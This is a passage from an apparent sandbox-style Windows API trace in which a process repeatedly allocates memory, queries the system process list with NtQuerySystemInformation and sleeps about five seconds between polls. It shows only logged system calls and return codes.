Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0114.708] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0114.708] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0114.708] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0114.711] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0114.712] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0114.723] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0114.723] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0114.724] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0114.724] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0114.724] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0114.727] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0114.727] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0114.739] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0114.739] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0114.740] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0114.740] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0114.740] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0114.742] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0114.743] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0114.754] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0114.754] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0114.755] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0114.755] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0114.756] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0114.758] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0114.760] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0114.770] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0114.770] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0114.771] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0114.771] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0114.771] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0114.773] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0114.774] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0114.787] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0114.788] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0114.788] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0114.788] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0114.788] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0114.790] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0114.791] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0114.801] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0114.801] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0114.801] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0114.802] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0114.802] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0114.804] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0114.805] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0114.830] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0114.830] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0114.831] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0114.831] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0114.831] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0114.834] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0114.834] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0114.848] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0114.848] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0114.848] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0114.849] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0114.849] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0114.851] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0114.852] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0114.863] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0114.863] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0114.864] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0114.864] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0114.864] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0114.867] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0114.868] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0114.879] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0114.879] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0114.880] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0114.880] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0114.880] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0114.882] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0114.883] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0114.895] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0114.896] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0114.896] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0114.896] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0114.897] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0114.899] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0114.900] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0114.910] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0114.910] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0114.911] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0114.911] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0114.911] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0114.914] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0114.915] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0114.926] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0114.926] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0114.926] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0114.927] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0114.927] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0114.930] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0114.931] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0114.941] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0114.941] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0114.942] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0114.942] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0114.942] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0114.946] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0114.946] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0114.957] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0114.957] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0114.958] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0114.958] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0114.958] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0114.961] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0114.961] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0114.972] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0114.973] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0114.973] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0114.973] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0114.974] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0114.976] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0114.977] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0114.988] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0114.988] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0114.989] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0114.989] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0114.989] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0114.992] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0114.992] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0115.004] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0115.004] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0115.005] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0115.005] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0115.005] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0115.007] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0115.008] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0115.019] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0115.020] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0115.020] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0115.021] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0115.021] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0115.024] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0115.024] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0115.035] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0115.035] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0115.036] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0115.036] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0115.036] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0115.038] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0115.039] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0115.050] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0115.051] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0115.051] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0115.051] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, 